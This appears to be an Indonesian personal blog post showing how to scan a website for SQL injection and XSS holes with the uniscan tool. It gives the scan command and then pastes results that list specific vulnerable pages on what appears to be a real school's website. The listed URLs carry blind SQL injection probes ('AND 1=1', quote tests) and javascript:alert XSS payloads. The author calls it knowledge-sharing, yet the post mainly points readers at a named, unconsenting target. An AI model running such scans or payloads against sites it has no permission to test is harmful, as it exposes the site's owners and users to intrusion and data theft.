udah 7 jam gw pake ini os :D , yah ga jauh beda ama ubuntu lama gw, cuma ini toolsnya lebih lengkap *ehcurhat. postingan kali ini gw mau share cara mengetahui celah website misalnya : sqli, xss, kali ini gw pake uniscan. ini sekedar pengetahuan gan & gw bukan hekel. ok langsung saja
[+] uniscan
nah seperti itu penampakannya, lanjut
[+] uniscan http://sempak.com/ -qweds , gw pake perintah defaultnya aja
dan sekian lama menunggu sekitar 2 menit ketemulah anu'nya
| Blind SQL Injection:
| [+] Vul [Blind SQL-i]: http://www.thelaureate.edu.pk/contents.php?id=18+AND+1=1
| [+] Keyword: Temporarily
| [+] Vul [Blind SQL-i]: http://www.thelaureate.edu.pk/contents.php?id=10+AND+1=1
| [+] Keyword: status
| [+] Vul [Blind SQL-i]: http://www.thelaureate.edu.pk/notice-board.php?linkid=8+AND+1=1
| [+] Keyword: Bokhari
|
|
| Local File Include:
|
|
| PHP CGI Argument Injection:
|
|
| Remote Command Execution:
|
|
| Remote File Include:
|
|
| SQL Injection:
| [+] Vul [SQL-i] http://www.thelaureate.edu.pk/contents.php?id=16"
| [+] Vul [SQL-i] http://www.thelaureate.edu.pk/contents.php?id=8'
| [+] Vul [SQL-i] http://www.thelaureate.edu.pk/news-event.php?id=8"
| [+] Vul [SQL-i] http://www.thelaureate.edu.pk/news-event.php?id=9'
| [+] Vul [SQL-i] http://www.thelaureate.edu.pk/notice-board.php?linkid=13"
| [+] Vul [SQL-i] http://www.thelaureate.edu.pk/notice-board.php?linkid=9'
| [+] Vul [SQL-i] http://www.thelaureate.edu.pk/notice-board.php?linkid=9"
|
|
| Cross-Site Scripting (XSS):
| [+] Vul [XSS] http://www.thelaureate.edu.pk/notice-board.php?linkid=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
| [+] Vul [XSS] http://www.thelaureate.edu.pk/notice-board.php?linkid=<DIV STYLE="background-image: url(javascript:alert('XSS'))">
| [+] Vul [XSS] http://www.thelaureate.edu.pk/notice-board.php?linkid=<table background="javascript:alert('XSS')"></table>
sekian postingan dari saya semoga bermanfaat ^_^ ~
Post a Comment
Post a Comment